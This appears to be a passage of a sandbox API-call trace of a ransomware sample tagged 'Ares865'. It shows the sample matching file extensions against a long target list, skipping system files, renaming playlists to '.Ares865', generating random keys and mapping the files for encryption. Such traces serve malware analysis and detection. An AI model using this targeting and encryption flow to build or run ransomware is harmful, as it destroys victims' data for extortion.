[0065.033] lstrcmpiW (lpString1="wpl", lpString2="jtx") returned 1 [0065.033] lstrlenW (lpString="kdb") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="kdb") returned 1 [0065.034] lstrlenW (lpString="kexi") returned 4 [0065.034] lstrcmpiW (lpString1=".wpl", lpString2="kexi") returned -1 [0065.034] lstrlenW (lpString="kexic") returned 5 [0065.034] lstrcmpiW (lpString1="s.wpl", lpString2="kexic") returned 1 [0065.034] lstrlenW (lpString="kexis") returned 5 [0065.034] lstrcmpiW (lpString1="s.wpl", lpString2="kexis") returned 1 [0065.034] lstrlenW (lpString="lgc") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="lgc") returned 1 [0065.034] lstrlenW (lpString="lwx") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="lwx") returned 1 [0065.034] lstrlenW (lpString="maf") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="maf") returned 1 [0065.034] lstrlenW (lpString="maq") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="maq") returned 1 [0065.034] lstrlenW (lpString="mar") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="mar") returned 1 [0065.034] lstrlenW (lpString="marshal") returned 7 [0065.034] lstrcmpiW (lpString1="ars.wpl", lpString2="marshal") returned -1 [0065.034] lstrlenW (lpString="mas") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="mas") returned 1 [0065.034] lstrlenW (lpString="mav") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="mav") returned 1 [0065.034] lstrlenW (lpString="maw") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="maw") returned 1 [0065.034] lstrlenW (lpString="mdbhtml") returned 7 [0065.034] lstrcmpiW (lpString1="ars.wpl", lpString2="mdbhtml") returned -1 [0065.034] lstrlenW (lpString="mdn") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="mdn") returned 1 [0065.034] lstrlenW (lpString="mdt") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="mdt") returned 1 [0065.034] lstrlenW (lpString="mfd") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="mfd") returned 1 [0065.034] lstrlenW (lpString="mpd") returned 3 [0065.034] lstrcmpiW (lpString1="wpl", lpString2="mpd") returned 1 [0065.034] lstrlenW (lpString="mrg") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="mrg") returned 1 [0065.035] lstrlenW (lpString="mud") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="mud") returned 1 [0065.035] lstrlenW (lpString="mwb") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="mwb") returned 1 [0065.035] lstrlenW (lpString="myd") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="myd") returned 1 [0065.035] lstrlenW (lpString="ndf") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="ndf") returned 1 [0065.035] lstrlenW (lpString="nnt") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="nnt") returned 1 [0065.035] lstrlenW (lpString="nrmlib") returned 6 [0065.035] lstrcmpiW (lpString1="rs.wpl", lpString2="nrmlib") returned 1 [0065.035] lstrlenW (lpString="ns2") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="ns2") returned 1 [0065.035] lstrlenW (lpString="ns3") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="ns3") returned 1 [0065.035] lstrlenW (lpString="ns4") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="ns4") returned 1 [0065.035] lstrlenW (lpString="nsf") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="nsf") returned 1 [0065.035] lstrlenW (lpString="nv") returned 2 [0065.035] lstrcmpiW (lpString1="pl", lpString2="nv") returned 1 [0065.035] lstrlenW (lpString="nv2") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="nv2") returned 1 [0065.035] lstrlenW (lpString="nwdb") returned 4 [0065.035] lstrcmpiW (lpString1=".wpl", lpString2="nwdb") returned -1 [0065.035] lstrlenW (lpString="nyf") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="nyf") returned 1 [0065.035] lstrlenW (lpString="odb") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="odb") returned 1 [0065.035] lstrlenW (lpString="odb") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="odb") returned 1 [0065.035] lstrlenW (lpString="oqy") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="oqy") returned 1 [0065.035] lstrlenW (lpString="ora") returned 3 [0065.035] lstrcmpiW (lpString1="wpl", lpString2="ora") returned 1 [0065.036] lstrlenW (lpString="orx") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="orx") returned 1 [0065.036] lstrlenW (lpString="owc") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="owc") returned 1 [0065.036] lstrlenW (lpString="p96") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="p96") returned 1 [0065.036] lstrlenW (lpString="p97") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="p97") returned 1 [0065.036] lstrlenW (lpString="pan") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="pan") returned 1 [0065.036] lstrlenW (lpString="pdb") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="pdb") returned 1 [0065.036] lstrlenW (lpString="pdm") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="pdm") returned 1 [0065.036] lstrlenW (lpString="pnz") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="pnz") returned 1 [0065.036] lstrlenW (lpString="qry") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="qry") returned 1 [0065.036] lstrlenW (lpString="qvd") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="qvd") returned 1 [0065.036] lstrlenW (lpString="rbf") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="rbf") returned 1 [0065.036] lstrlenW (lpString="rctd") returned 4 [0065.036] lstrcmpiW (lpString1=".wpl", lpString2="rctd") returned -1 [0065.036] lstrlenW (lpString="rod") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="rod") returned 1 [0065.036] lstrlenW (lpString="rodx") returned 4 [0065.036] lstrcmpiW (lpString1=".wpl", lpString2="rodx") returned -1 [0065.036] lstrlenW (lpString="rpd") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="rpd") returned 1 [0065.036] lstrlenW (lpString="rsd") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="rsd") returned 1 [0065.036] lstrlenW (lpString="sas7bdat") returned 8 [0065.036] lstrcmpiW (lpString1="tars.wpl", lpString2="sas7bdat") returned 1 [0065.036] lstrlenW (lpString="sbf") returned 3 [0065.036] lstrcmpiW (lpString1="wpl", lpString2="sbf") returned 1 [0065.036] lstrlenW (lpString="scx") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="scx") returned 1 [0065.037] lstrlenW (lpString="sdb") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="sdb") returned 1 [0065.037] lstrlenW (lpString="sdc") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="sdc") returned 1 [0065.037] lstrlenW (lpString="sdf") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="sdf") returned 1 [0065.037] lstrlenW (lpString="sis") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="sis") returned 1 [0065.037] lstrlenW (lpString="spq") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="spq") returned 1 [0065.037] lstrlenW (lpString="te") returned 2 [0065.037] lstrcmpiW (lpString1="pl", lpString2="te") returned -1 [0065.037] lstrlenW (lpString="teacher") returned 7 [0065.037] lstrcmpiW (lpString1="ars.wpl", lpString2="teacher") returned -1 [0065.037] lstrlenW (lpString="tmd") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="tmd") returned 1 [0065.037] lstrlenW (lpString="tps") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="tps") returned 1 [0065.037] lstrlenW (lpString="trc") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="trc") returned 1 [0065.037] lstrlenW (lpString="trc") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="trc") returned 1 [0065.037] lstrlenW (lpString="trm") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="trm") returned 1 [0065.037] lstrlenW (lpString="udb") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="udb") returned 1 [0065.037] lstrlenW (lpString="udl") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="udl") returned 1 [0065.037] lstrlenW (lpString="usr") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="usr") returned 1 [0065.037] lstrlenW (lpString="v12") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="v12") returned 1 [0065.037] lstrlenW (lpString="vis") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="vis") returned 1 [0065.037] lstrlenW (lpString="vpd") returned 3 [0065.037] lstrcmpiW (lpString1="wpl", lpString2="vpd") returned 1 [0065.037] lstrlenW (lpString="vvv") returned 3 [0065.038] lstrcmpiW (lpString1="wpl", lpString2="vvv") returned 1 [0065.038] lstrlenW (lpString="wdb") returned 3 [0065.038] lstrcmpiW (lpString1="wpl", lpString2="wdb") returned 1 [0065.038] lstrlenW (lpString="wmdb") returned 4 [0065.038] lstrcmpiW (lpString1=".wpl", lpString2="wmdb") returned -1 [0065.038] lstrlenW (lpString="wrk") returned 3 [0065.038] lstrcmpiW (lpString1="wpl", lpString2="wrk") returned -1 [0065.038] lstrlenW (lpString="xdb") returned 3 [0065.038] lstrcmpiW (lpString1="wpl", lpString2="xdb") returned -1 [0065.038] lstrlenW (lpString="xld") returned 3 [0065.038] lstrcmpiW (lpString1="wpl", lpString2="xld") returned -1 [0065.038] lstrlenW (lpString="xmlff") returned 5 [0065.038] lstrcmpiW (lpString1="s.wpl", lpString2="xmlff") returned -1 [0065.038] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.Ares865") returned 132 [0065.038] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0065.039] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.039] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1044) returned 1 [0065.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.039] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0065.040] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.040] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0065.040] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x154 [0065.042] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x190000 [0065.042] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.043] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.043] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.043] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.043] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.044] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.044] CloseHandle (hObject=0x154) returned 1 [0065.044] CloseHandle (hObject=0x164) returned 1 [0065.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.044] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="02_Music_added_in_the_last_month.wpl", cAlternateFileName="02_MUS~1.WPL")) returned 1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="aoldtz.exe") returned -1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".") returned 1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="..") returned 1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="windows") returned -1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="bootmgr") returned -1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="temp") returned -1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="pagefile.sys") returned -1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="boot") returned -1 [0065.044] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="ids.txt") returned -1 [0065.045] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="ntuser.dat") returned -1 [0065.045] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="perflogs") returned -1 [0065.045] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="MSBuild") returned -1 [0065.045] lstrlenW (lpString="02_Music_added_in_the_last_month.wpl") returned 36 [0065.045] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 124 [0065.045] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="02_Music_added_in_the_last_month.wpl" | out: lpString1="02_Music_added_in_the_last_month.wpl") returned="02_Music_added_in_the_last_month.wpl" [0065.045] lstrlenW (lpString="02_Music_added_in_the_last_month.wpl") returned 36 [0065.045] lstrlenW (lpString="Ares865") returned 7 [0065.045] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0065.045] lstrlenW (lpString=".dll") returned 4 [0065.045] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".dll") returned 1 [0065.045] lstrlenW (lpString=".lnk") returned 4 [0065.045] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".lnk") returned 1 [0065.045] lstrlenW (lpString=".ini") returned 4 [0065.065] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".ini") returned 1 [0065.066] lstrlenW (lpString=".sys") returned 4 [0065.066] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2=".sys") returned 1 [0065.066] lstrlenW (lpString="02_Music_added_in_the_last_month.wpl") returned 36 [0065.066] lstrlenW (lpString="bak") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="bak") returned 1 [0065.067] lstrlenW (lpString="ba_") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="ba_") returned 1 [0065.067] lstrlenW (lpString="dbb") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="dbb") returned 1 [0065.067] lstrlenW (lpString="vmdk") returned 4 [0065.067] lstrcmpiW (lpString1=".wpl", lpString2="vmdk") returned -1 [0065.067] lstrlenW (lpString="rar") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="rar") returned 1 [0065.067] lstrlenW (lpString="zip") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="zip") returned -1 [0065.067] lstrlenW (lpString="tgz") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="tgz") returned 1 [0065.067] lstrlenW (lpString="vbox") returned 4 [0065.067] lstrcmpiW (lpString1=".wpl", lpString2="vbox") returned -1 [0065.067] lstrlenW (lpString="vdi") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="vdi") returned 1 [0065.067] lstrlenW (lpString="vhd") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="vhd") returned 1 [0065.067] lstrlenW (lpString="vhdx") returned 4 [0065.067] lstrcmpiW (lpString1=".wpl", lpString2="vhdx") returned -1 [0065.067] lstrlenW (lpString="avhd") returned 4 [0065.067] lstrcmpiW (lpString1=".wpl", lpString2="avhd") returned -1 [0065.067] lstrlenW (lpString="db") returned 2 [0065.067] lstrcmpiW (lpString1="pl", lpString2="db") returned 1 [0065.067] lstrlenW (lpString="db2") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="db2") returned 1 [0065.067] lstrlenW (lpString="db3") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="db3") returned 1 [0065.067] lstrlenW (lpString="dbf") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="dbf") returned 1 [0065.067] lstrlenW (lpString="mdf") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="mdf") returned 1 [0065.067] lstrlenW (lpString="mdb") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="mdb") returned 1 [0065.067] lstrlenW (lpString="sql") returned 3 [0065.067] lstrcmpiW (lpString1="wpl", lpString2="sql") returned 1 [0065.068] lstrlenW (lpString="sqlite") returned 6 [0065.068] lstrcmpiW (lpString1="th.wpl", lpString2="sqlite") returned 1 [0065.068] lstrlenW (lpString="sqlite3") returned 7 [0065.068] lstrcmpiW (lpString1="nth.wpl", lpString2="sqlite3") returned -1 [0065.068] lstrlenW (lpString="sqlitedb") returned 8 [0065.068] lstrcmpiW (lpString1="onth.wpl", lpString2="sqlitedb") returned -1 [0065.068] lstrlenW (lpString="xml") returned 3 [0065.068] lstrcmpiW (lpString1="wpl", lpString2="xml") returned -1 [0065.068] lstrlenW (lpString="$er") returned 3 [0065.068] lstrcmpiW (lpString1="wpl", lpString2="$er") returned 1 [0065.068] lstrlenW (lpString="4dd") returned 3 [0065.068] lstrcmpiW (lpString1="wpl", lpString2="4dd") returned 1 [0065.068] lstrlenW (lpString="4dl") returned 3 [0065.068] lstrcmpiW (lpString1="wpl", lpString2="4dl") returned 1 [0065.068] lstrlenW (lpString="^^^") returned 3 [0065.068] lstrcmpiW (lpString1="wpl", lpString2="^^^") returned 1 [0065.068] lstrlenW (lpString="abs") returned 3 [0065.068] lstrcmpiW (lpString1="wpl", lpString2="abs") returned 1 [0065.068] lstrlenW (lpString="abx") returned 3 [0065.068] lstrcmpiW (lpString1="wpl", lpString2="abx") returned 1 [0065.068] lstrlenW (lpString="accdb") returned 5 [0065.068] lstrcmpiW (lpString1="h.wpl", lpString2="accdb") returned 1 [0065.068] lstrlenW (lpString="accdc") returned 5 [0065.068] lstrcmpiW (lpString1="h.wpl", lpString2="accdc") returned 1 [0065.068] lstrlenW (lpString="accde") returned 5 [0065.068] lstrcmpiW (lpString1="h.wpl", lpString2="accde") returned 1 [0065.068] lstrlenW (lpString="accdr") returned 5 [0065.068] lstrcmpiW (lpString1="h.wpl", lpString2="accdr") returned 1 [0065.068] lstrlenW (lpString="accdt") returned 5 [0065.068] lstrcmpiW (lpString1="h.wpl", lpString2="accdt") returned 1 [0065.068] lstrlenW (lpString="accdw") returned 5 [0065.068] lstrcmpiW (lpString1="h.wpl", lpString2="accdw") returned 1 [0065.068] lstrlenW (lpString="accft") returned 5 [0065.068] lstrcmpiW (lpString1="h.wpl", lpString2="accft") returned 1 [0065.068] lstrlenW (lpString="adb") returned 3 [0065.068] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.068] lstrlenW (lpString="adb") returned 3 [0065.068] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.069] lstrlenW (lpString="ade") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="ade") returned 1 [0065.069] lstrlenW (lpString="adf") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="adf") returned 1 [0065.069] lstrlenW (lpString="adn") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="adn") returned 1 [0065.069] lstrlenW (lpString="adp") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="adp") returned 1 [0065.069] lstrlenW (lpString="alf") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="alf") returned 1 [0065.069] lstrlenW (lpString="ask") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="ask") returned 1 [0065.069] lstrlenW (lpString="btr") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="btr") returned 1 [0065.069] lstrlenW (lpString="cat") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="cat") returned 1 [0065.069] lstrlenW (lpString="cdb") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="cdb") returned 1 [0065.069] lstrlenW (lpString="ckp") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="ckp") returned 1 [0065.069] lstrlenW (lpString="cma") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="cma") returned 1 [0065.069] lstrlenW (lpString="cpd") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="cpd") returned 1 [0065.069] lstrlenW (lpString="dacpac") returned 6 [0065.069] lstrcmpiW (lpString1="th.wpl", lpString2="dacpac") returned 1 [0065.069] lstrlenW (lpString="dad") returned 3 [0065.069] lstrcmpiW (lpString1="wpl", lpString2="dad") returned 1 [0065.069] lstrlenW (lpString="dadiagrams") returned 10 [0065.069] lstrcmpiW (lpString1="_month.wpl", lpString2="dadiagrams") returned -1 [0065.069] lstrlenW (lpString="daschema") returned 8 [0065.069] lstrcmpiW (lpString1="onth.wpl", lpString2="daschema") returned 1 [0065.069] lstrlenW (lpString="db-journal") returned 10 [0065.069] lstrcmpiW (lpString1="_month.wpl", lpString2="db-journal") returned -1 [0065.069] lstrlenW (lpString="db-shm") returned 6 [0065.069] lstrcmpiW (lpString1="th.wpl", lpString2="db-shm") returned 1 [0065.069] lstrlenW (lpString="db-wal") returned 6 [0065.069] lstrcmpiW (lpString1="th.wpl", lpString2="db-wal") returned 1 [0065.070] lstrlenW (lpString="dbc") returned 3 [0065.070] lstrcmpiW (lpString1="wpl", lpString2="dbc") returned 1 [0065.070] lstrlenW (lpString="dbs") returned 3 [0065.070] lstrcmpiW (lpString1="wpl", lpString2="dbs") returned 1 [0065.070] lstrlenW (lpString="dbt") returned 3 [0065.070] lstrcmpiW (lpString1="wpl", lpString2="dbt") returned 1 [0065.070] lstrlenW (lpString="dbv") returned 3 [0065.070] lstrcmpiW (lpString1="wpl", lpString2="dbv") returned 1 [0065.070] lstrlenW (lpString="dbx") returned 3 [0065.070] lstrcmpiW (lpString1="wpl", lpString2="dbx") returned 1 [0065.070] lstrlenW (lpString="dcb") returned 3 [0065.070] lstrcmpiW (lpString1="wpl", lpString2="dcb") returned 1 [0065.070] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.Ares865") returned 134 [0065.070] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.ares865"), dwFlags=0x1) returned 1 [0065.072] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.072] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1279) returned 1 [0065.072] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.072] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.072] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.073] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.074] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.074] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.074] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x154 [0065.075] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0065.076] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, 